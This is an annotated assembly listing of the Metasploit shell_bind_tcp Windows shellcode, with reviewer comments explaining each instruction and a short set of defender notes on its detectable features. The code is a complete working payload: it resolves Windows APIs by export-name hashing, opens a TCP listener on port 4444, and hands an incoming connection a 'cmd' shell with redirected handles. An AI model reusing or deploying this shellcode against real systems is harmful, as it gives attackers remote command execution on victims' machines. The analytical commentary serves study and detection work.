;
; Metasploit Framework
; http://www.metasploit.com
;
; Source for shell_bind_tcp (single)
;
; Authors: vlad902 <vlad902@gmail.com>
; Size : 317
;
; Syntax:  NASM/Intel, 32-bit Windows user mode, position independent
;          (no data section; every constant is an immediate or lives on
;          the stack).
;
; NOTE(review): this reads like a disassembler dump rather than assembler
; input -- the branch targets (call 0x2, jz 0x34, jmp short 0x28, jnz 0x1f)
; are byte offsets into the 317-byte blob, not labels, and will not
; reassemble verbatim. Offsets quoted in the comments below were recomputed
; from the instruction encodings; confirm against the built payload.
;
; Layout:
;   0x00       cld, then a `call` into the middle of the `push` at 0x01.
;              The bytes at 0x02 (EB 4D) decode as `jmp short 0x51`, so
;              execution skips the resolver, and the return address pushed
;              by the call (= address of `pusha`, 0x09) is the resolver
;              entry point. It is recovered later with `pop esi`.
;   0x09-0x50  API resolver: eax = resolve(module_base, hash). Walks the PE
;              export directory of module_base and compares a ror-13/add
;              rolling hash of each export name against hash. Called as
;              `push hash / push base / call esi`; the two dword arguments
;              are NOT popped by the callee (they are dropped late, at
;              `add esp,byte +0x64`, and one leftover pair is reused there).
;   0x51-end   main body: locate kernel32 via the PEB, load ws2_32, create
;              a listening TCP socket on port 4444 (INADDR_ANY), accept one
;              client, spawn "cmd" with its std handles redirected to the
;              client socket, wait for it, close the socket, ExitProcess.
;
; The API names below are inferred from the hash values and from the
; argument layout at each call site; confirm by hashing the export names.
;
; Defender notes: the fs:[0x30] PEB walk, the ror-13/add export hashing,
; the inline "ws2_32" / "cmd" strings and the fixed port 4444 (0x115c,
; stored byte-swapped as 0x5c11) are the stable features of this payload.
;

cld                                     ; DF=0: lodsb/lodsd/stosb/stosd walk forward
push byte -0x15                         ; 6A EB: never executed as a push; its second byte (EB) is
dec ebp                                 ;   the `jmp short` opcode and 4D (dec ebp) its displacement
call 0x2                                ; push &resolver (0x09) as return address, then land on the
                                        ;   `jmp short 0x51` hidden at offset 0x02
pusha                                   ; --- resolver entry (0x09). After pusha:
                                        ;   [esp+0x20]=ret, [esp+0x24]=module base, [esp+0x28]=hash
mov ebp,[esp+0x24]                      ; ebp = module base
mov eax,[ebp+0x3c]                      ; eax = e_lfanew (offset of the PE header)
mov edi,[ebp+eax+0x78]                  ; edi = RVA of the export directory (DataDirectory[0])
add edi,ebp                             ; edi = &IMAGE_EXPORT_DIRECTORY
mov ecx,[edi+0x18]                      ; ecx = NumberOfNames
mov ebx,[edi+0x20]                      ; ebx = RVA of AddressOfNames
add ebx,ebp                             ; ebx = &AddressOfNames[0]
dec ecx                                 ; 0x1f: next name index, walking from last to first (no
                                        ;   underflow guard: an absent export loops into garbage)
mov esi,[ebx+ecx*4]                     ; esi = RVA of name[ecx]
add esi,ebp                             ; esi = &name[ecx]
xor eax,eax                             ; eax = 0 (byte accumulator)
cdq                                     ; edx = 0 (hash accumulator)
lodsb                                   ; 0x28: al = next byte of the name
test al,al                              ;
jz 0x34                                 ; NUL terminator -> compare the hash
ror edx,0xd                             ; hash = ror(hash, 13) + byte
add edx,eax                             ;
jmp short 0x28                          ;
cmp edx,[esp+0x28]                      ; 0x34: hash == requested hash?
jnz 0x1f                                ; no -> try the previous name
mov ebx,[edi+0x24]                      ; ebx = RVA of AddressOfNameOrdinals
add ebx,ebp                             ;
mov cx,[ebx+ecx*2]                      ; cx = ordinal of name[ecx] (16-bit table; assumes the upper
                                        ;   half of ecx is already 0, i.e. NumberOfNames < 0x10000)
mov ebx,[edi+0x1c]                      ; ebx = RVA of AddressOfFunctions
add ebx,ebp                             ;
add ebp,[ebx+ecx*4]                     ; ebp = base + function RVA = resolved address
mov [esp+0x1c],ebp                      ; overwrite the saved-eax slot so popa returns it in eax
popa                                    ;
ret                                     ; back to caller; (base, hash) stay on the stack
xor ebx,ebx                             ; 0x51: main body starts here; ebx = 0
mov eax,[fs:ebx+0x30]                   ; eax = PEB (fs:[0x30])
mov eax,[eax+0xc]                       ; eax = PEB->Ldr
mov esi,[eax+0x1c]                      ; esi = InInitializationOrderModuleList.Flink
lodsd                                   ; eax = second entry of that list (assumed to be kernel32,
                                        ;   an XP-era layout assumption that is not checked)
mov eax,[eax+0x8]                       ; eax = that entry's DllBase (kernel32 base)
pop esi                                 ; esi = resolver address pushed by `call 0x2`
push dword 0xec0e4e8e                   ; hash of LoadLibraryA (presumed)
push eax                                ; kernel32 base
call esi                                ; eax = LoadLibraryA
push bx                                 ; build "ws2_32\0\0" on the stack, highest bytes first:
push word 0x3233                        ;   "23"
push dword 0x5f327377                   ;   "ws2_"
push esp                                ; lpLibFileName = &"ws2_32"
call eax                                ; eax = LoadLibraryA("ws2_32")
push dword 0x3bfcedcb                   ; hash of WSAStartup (presumed)
push eax                                ; ws2_32 base
call esi                                ; eax = WSAStartup
pop edi                                 ; edi = ws2_32 base (the dword left behind by the resolver)
mov ebp,esp                             ;
sub bp,0x208                            ; ebp = esp - 0x208: WSADATA scratch below the stack pointer.
                                        ;   16-bit subtract to save bytes; assumes the low word of
                                        ;   esp is >= 0x208 so no borrow is lost
push ebp                                ; lpWSAData
push byte +0x2                          ; wVersionRequested = 2
call eax                                ; WSAStartup(2, &wsadata)
push dword 0xadf509d9                   ; hash of WSASocketA (presumed)
push edi                                ;
call esi                                ; eax = WSASocketA
push ebx                                ; seven pushes for a six-argument stdcall: the extra 0 is
push ebx                                ;   still on the stack after the callee's cleanup and
push ebx                                ;   becomes sin_addr (INADDR_ANY) of the sockaddr built below
push ebx                                ;
push ebx                                ;
inc ebx                                 ; ebx = 1
push ebx                                ; type = SOCK_STREAM (1)
inc ebx                                 ; ebx = 2
push ebx                                ; af = AF_INET (2)
call eax                                ; eax = WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0)
push word 0x5c11                        ; sin_port = htons(4444)
push bx                                 ; sin_family = AF_INET (ebx is still 2)
mov ecx,esp                             ; ecx = &sockaddr_in { AF_INET, 4444, INADDR_ANY }
xchg eax,ebp                            ; ebp = listening socket (eax gets the stale WSADATA ptr)
push dword 0xc7701aa4                   ; hash of bind (presumed)
push edi                                ;
call esi                                ; eax = bind
push byte +0x10                         ; namelen = sizeof(sockaddr_in)
push ecx                                ; name
push ebp                                ; s
call eax                                ; bind(s, &addr, 16)
push dword 0xe92eada4                   ; hash of listen (presumed)
push edi                                ;
call esi                                ; eax = listen
push ebx                                ; backlog = 2
push ebp                                ; s
call eax                                ; listen(s, 2)
push dword 0x498649e5                   ; hash of accept (presumed)
push edi                                ;
call esi                                ; eax = accept
push eax                                ; scratch dword; its address is passed as addrlen below, so
                                        ;   accept overwrites it and the leftover dwords above it
                                        ;   with the peer address -- nothing there is used again
push esp                                ; addrlen = &scratch
push esp                                ; addr    = &(that pointer) -- output discarded
push ebp                                ; s
call eax                                ; eax = accept(s, addr, &addrlen) = client socket
xchg eax,ebx                            ; ebx = client socket
push dword 0x79c679e7                   ; hash of closesocket (presumed); this (base, hash) pair is
push edi                                ;   reused by the second `call esi` after `add esp,byte +0x64`
call esi                                ; eax = closesocket
push ebp                                ; listening socket
call eax                                ; closesocket(listener)
o16 push byte +0x64                     ; build "cmd\0" on the stack: 16-bit push of "d\0"
push word 0x6d63                        ;   "cm"
mov ebp,esp                             ; ebp = &"cmd" (lpCommandLine)
push byte +0x50                         ;
pop ecx                                 ; ecx = 0x50
sub esp,ecx                             ; reserve 0x50 bytes: STARTUPINFO minus cb, plus PROCESS_INFORMATION
mov edi,esp                             ; edi = start of the area to zero
push byte +0x44                         ; STARTUPINFO.cb = 0x44 (sizeof), pushed just below that area
mov edx,esp                             ; edx = &STARTUPINFO
xor eax,eax                             ;
rep stosb                               ; zero the 0x50 bytes above cb; leaves ecx = 0, eax = 0
inc byte [edx+0x2d]                     ; dwFlags |= 0x100 (STARTF_USESTDHANDLES)
inc byte [edx+0x2c]                     ; dwFlags |= 0x001 (STARTF_USESHOWWINDOW); wShowWindow stays 0
xchg eax,ebx                            ; eax = client socket, ebx = 0
lea edi,[edx+0x38]                      ; edi = &si.hStdInput
stosd                                   ; hStdInput  = socket
stosd                                   ; hStdOutput = socket
stosd                                   ; hStdError  = socket; edi now = &PROCESS_INFORMATION (edx+0x44)
push dword 0x16b3fe72                   ; hash of CreateProcessA (presumed)
push dword [ebp+0x44]                   ; kernel32 base, still on the stack from the first resolve
                                        ;   (0x44 bytes above "cmd" given the pushes made since then)
call esi                                ; eax = CreateProcessA
pop ebx                                 ; ebx = kernel32 base
push edi                                ; lpProcessInformation
push edx                                ; lpStartupInfo
push ecx                                ; lpCurrentDirectory  = NULL (ecx == 0 since rep stosb)
push ecx                                ; lpEnvironment       = NULL
push ecx                                ; dwCreationFlags     = 0
push byte +0x1                          ; bInheritHandles     = TRUE (required for the socket handles)
push ecx                                ; lpThreadAttributes  = NULL
push ecx                                ; lpProcessAttributes = NULL
push ebp                                ; lpCommandLine       = "cmd"
push ecx                                ; lpApplicationName   = NULL
call eax                                ; CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)
push dword 0xce05d9ad                   ; hash of WaitForSingleObject (presumed)
push ebx                                ;
call esi                                ; eax = WaitForSingleObject
push byte -0x1                          ; dwMilliseconds = INFINITE
push dword [edi]                        ; pi.hProcess
call eax                                ; WaitForSingleObject(hProcess, INFINITE)
mov edx,[edi-0x4]                       ; edx = si.hStdError = client socket
add esp,byte +0x64                      ; drop (k32, hash, hash, si+pi, "cmd"): esp now points at the
                                        ;   (ws2_32 base, closesocket hash) pair left behind earlier
call esi                                ; eax = closesocket, resolved from that leftover pair
push edx                                ; client socket
call eax                                ; closesocket(client)
push dword 0x5f048af0                   ; hash of ExitProcess (presumed)
push ebx                                ; kernel32 base
call esi                                ; eax = ExitProcess
call eax                                ; ExitProcess(uExitCode = whatever dword is on top, i.e. the
                                        ;   kernel32 base left by the resolver); never returns